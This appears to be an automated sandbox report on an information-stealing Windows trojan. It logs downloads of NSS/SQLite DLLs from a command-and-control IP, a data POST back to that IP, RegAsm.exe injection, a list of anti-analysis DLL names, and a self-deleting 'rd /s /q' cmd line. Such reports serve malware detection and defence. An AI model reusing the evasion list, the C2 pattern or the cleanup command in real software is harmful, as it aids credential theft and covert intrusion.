                  Source: global traffic HTTP traffic detected: GET /softokn3.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1 Host: 95.217.240.101 Cache-Control: no-cache
                  Source: global traffic HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1 Host: 95.217.240.101 Cache-Control: no-cache
                  Source: global traffic DNS traffic detected: DNS query: steamcommunity.com
                  Source: unknown HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----HIIEGHJJDGHCAKEBGIJK User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1 Host: 95.217.240.101 Content-Length: 278 Connection: Keep-Alive Cache-Control: no-cache
                  Source: KJKJJJ.2.drString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                  Source: KJKJJJ.2.drString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL
                  Source: file.exe, 00000000.00000002.1950868153.0000000000AD8000.00000004.00000001.01000000.00000003.sdmp, RegAsm.exe, RegAsm.exe, 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://t.me/k0mono
                  Source: unknown HTTPS traffic detected: 104.102.42.29:443 -> 192.168.2.5:49704 version: TLS 1.2
                  Source: unknown HTTPS traffic detected: 95.217.240.101:443 -> 192.168.2.5:49705 version: TLS 1.2
                  Source: unknown HTTPS traffic detected: 95.217.240.101:443 -> 192.168.2.5:49710 version: TLS 1.2
                  Source: unknown HTTPS traffic detected: 95.217.240.101:443 -> 192.168.2.5:49712 version: TLS 1.2
                  Source: unknown HTTPS traffic detected: 95.217.240.101:443 -> 192.168.2.5:49719 version: TLS 1.2
                  Source: unknown HTTPS traffic detected: 95.217.240.101:443 -> 192.168.2.5:49720 version: TLS 1.2
                  Source: unknown HTTPS traffic detected: 95.217.240.101:443 -> 192.168.2.5:49731 version: TLS 1.2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_004112FD _EH_prolog,memset,GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GlobalFix,GlobalSize,SelectObject,DeleteObject,DeleteObject,ReleaseDC,CloseWindow,2_2_004112FD

                  System Summary

                  Source: 2.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                  Source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                  Source: 0.2.file.exe.ab0000.0.unpack, type: UNPACKEDPE Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                  Source: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C81B8C0 rand_s,NtQueryVirtualMemory,2_2_6C81B8C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C81B910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError,2_2_6C81B910
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C81B700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,2_2_6C81B700
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C7BF280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,2_2_6C7BF280
                  Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: 2.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                  Source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                  Source: 0.2.file.exe.ab0000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                  Source: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                  Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@9/27@1/2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C817030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree,2_2_6C817030
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_004111BE _EH_prolog,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,2_2_004111BE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_004106C4 _EH_prolog,CoCreateInstance,SysAllocString,_wtoi64,SysFreeString,SysFreeString,2_2_004106C4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\76561199686524322[1].htm
                  Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5696:120:WilError_03
                  Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2860:120:WilError_03
                  Source: file.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File read: C:\$Recycle.Bin\S-1-5-21-2246122658-3693405117-2476756634-1003\desktop.ini
                  Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                  Source: softokn3[1].dll.2.dr, softokn3.dll.2.drBinary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
                  Source: RegAsm.exe, 00000002.00000002.2647272334.000000001B698000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2643922195.0000000015724000.00000004.00000020.00020000.00000000.sdmp, sqlx[1].dll.2.drBinary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
                  Source: HDGIJJ.2.dr, FCGCGD.2.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: RegAsm.exe, 00000002.00000002.2647272334.000000001B698000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2643922195.0000000015724000.00000004.00000020.00020000.00000000.sdmp, sqlx[1].dll.2.drBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                  Source: softokn3[1].dll.2.dr, softokn3.dll.2.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
                  Source: RegAsm.exe, 00000002.00000002.2647272334.000000001B698000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2643922195.0000000015724000.00000004.00000020.00020000.00000000.sdmp, sqlx[1].dll.2.drBinary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
                  Source: softokn3[1].dll.2.dr, softokn3.dll.2.drBinary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
                  Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                  Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\FCGCGDHJEGHJ" & exit
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
                  Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dll
                  Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wininet.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rstrtmgr.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dbghelp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iertutil.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wldp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: urlmon.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: srvcli.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: netutils.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: fwpuclnt.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: schannel.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mskeyprotect.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dpapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: gpapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncryptsslp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: amsi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: userenv.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sxs.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntmarta.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mozglue.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wsock32.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: vcruntime140.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msvcp140.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windowscodecs.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: propsys.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.fileexplorer.common.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntshrui.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.staterepositoryps.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: onecoreuapcommonproxystub.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: linkinfo.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dlnashext.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wpdshext.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: edputil.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wintypes.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: appresolver.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: bcp47langs.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: slc.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sppc.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: onecorecommonproxystub.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: pcacli.dll
                  Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
                  Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                  Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: mozglue.pdbP source: RegAsm.exe, 00000002.00000002.2650409954.000000006C82D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.2.dr, mozglue.dll.2.dr
                  Source: Binary string: freebl3.pdb source: freebl3.dll.2.dr, freebl3[1].dll.2.dr
                  Source: Binary string: freebl3.pdbp source: freebl3.dll.2.dr, freebl3[1].dll.2.dr
                  Source: Binary string: nss3.pdb@ source: RegAsm.exe, 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmp, nss3[1].dll.2.dr, nss3.dll.2.dr
                  Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.2.dr, softokn3.dll.2.dr
                  Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.2.dr, vcruntime140[1].dll.2.dr
                  Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140.dll.2.dr, msvcp140[1].dll.2.dr
                  Source: Binary string: nss3.pdb source: RegAsm.exe, 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmp, nss3[1].dll.2.dr, nss3.dll.2.dr
                  Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: RegAsm.exe, 00000002.00000002.2647272334.000000001B698000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2643922195.0000000015724000.00000004.00000020.00020000.00000000.sdmp, sqlx[1].dll.2.dr
                  Source: Binary string: mozglue.pdb source: RegAsm.exe, 00000002.00000002.2650409954.000000006C82D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.2.dr, mozglue.dll.2.dr
                  Source: Binary string: softokn3.pdb source: softokn3[1].dll.2.dr, softokn3.dll.2.dr
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00417645 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,2_2_00417645
                  Source: nss3.dll.2.drStatic PE information: section name: .00cfg
                  Source: nss3[1].dll.2.drStatic PE information: section name: .00cfg
                  Source: softokn3.dll.2.drStatic PE information: section name: .00cfg
                  Source: softokn3[1].dll.2.drStatic PE information: section name: .00cfg
                  Source: freebl3.dll.2.drStatic PE information: section name: .00cfg
                  Source: freebl3[1].dll.2.drStatic PE information: section name: .00cfg
                  Source: mozglue.dll.2.drStatic PE information: section name: .00cfg
                  Source: mozglue[1].dll.2.drStatic PE information: section name: .00cfg
                  Source: sqlx[1].dll.2.drStatic PE information: section name: .00cfg
                  Source: msvcp140.dll.2.drStatic PE information: section name: .didat
                  Source: msvcp140[1].dll.2.drStatic PE information: section name: .didat
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AB5CE8 push ecx; ret 0_2_00AB5CFB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004191D5 push ecx; ret 2_2_004191E8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C7EB536 push ecx; ret 2_2_6C7EB549
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\mozglue[1].dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\FCGCGDHJEGHJ\freebl3.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\msvcp140[1].dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\nss3[1].dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\FCGCGDHJEGHJ\msvcp140.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\FCGCGDHJEGHJ\vcruntime140.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\FCGCGDHJEGHJ\nss3.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\softokn3[1].dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\FCGCGDHJEGHJ\mozglue.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\FCGCGDHJEGHJ\softokn3.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\freebl3[1].dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\sqlx[1].dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\vcruntime140[1].dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 1600, type: MEMORYSTR
                  Source: RegAsm.exeBinary or memory string: DIR_WATCH.DLL
                  Source: RegAsm.exeBinary or memory string: SBIEDLL.DLL
                  Source: RegAsm.exeBinary or memory string: API_LOG.DLL
                  Source: RegAsm.exe, 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: AHAL9THJOHNDOEAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\mozglue[1].dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\ProgramData\FCGCGDHJEGHJ\freebl3.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\msvcp140[1].dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\nss3[1].dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\softokn3[1].dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\ProgramData\FCGCGDHJEGHJ\nss3.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\ProgramData\FCGCGDHJEGHJ\softokn3.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\freebl3[1].dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\sqlx[1].dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\vcruntime140[1].dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI coverage: 9.7 %
                  Source: C:\Windows\SysWOW64\timeout.exe TID: 5820Thread sleep count: 88 > 30
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040FCE5 GetKeyboardLayoutList followed by cmp: cmp eax, ebx and CTI: jbe 0040FDF8h2_2_0040FCE5
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile Volume queried: C:\ FullSizeInformation
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AC5AC6 FindFirstFileExW,0_2_00AC5AC6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00401162 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,FindNextFileA,FindClose,FindNextFileA,FindClose,2_2_00401162
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004162AF _EH_prolog,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,2_2_004162AF
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004153F6 _EH_prolog,wsprintfA,FindFirstFileA,memset,memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcat,strtok_s,memset,lstrcat,PathMatchSpecA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,strtok_s,FindNextFileA,FindClose,2_2_004153F6
